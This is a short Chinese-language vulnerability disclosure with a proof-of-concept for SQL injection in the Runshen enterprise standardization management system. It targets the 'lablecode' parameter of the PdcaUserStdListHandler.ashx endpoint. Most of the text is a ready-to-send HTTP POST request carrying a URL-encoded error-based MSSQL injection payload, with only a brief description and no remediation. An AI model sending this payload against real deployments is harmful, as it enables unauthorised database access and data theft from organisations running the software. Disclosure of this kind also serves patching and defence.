漏洞描述
润申信息企业标准化管理系统 PdcaUserStdListHandler.ashx接口存在SQL注入漏洞,lablecode参数存在注入,没用对传入的参数进行严格校验导致存在sqlz注入
润申信息企业标准化管理系统 PdcaUserStdListHandler.ashx SQL注入漏洞
PoC代码
POST /PDCA/ashx/PdcaUserStdListHandler.ashx?action=GetDataBy HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 232
Connection: close
code=1&lablecode=-9458%29+OR+5511+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28112%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%285511%3D5511%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28107%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29--+XeuQ&LableName=&page=1&rows=20